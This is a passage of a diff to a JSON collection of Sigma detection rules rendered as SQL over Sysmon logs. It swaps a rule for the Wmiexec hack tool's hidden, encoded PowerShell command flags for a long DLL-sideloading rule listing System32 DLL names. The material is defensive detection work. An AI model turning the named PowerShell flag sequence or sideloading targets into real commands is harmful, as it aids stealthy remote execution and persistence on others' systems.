'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects the 
execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE 
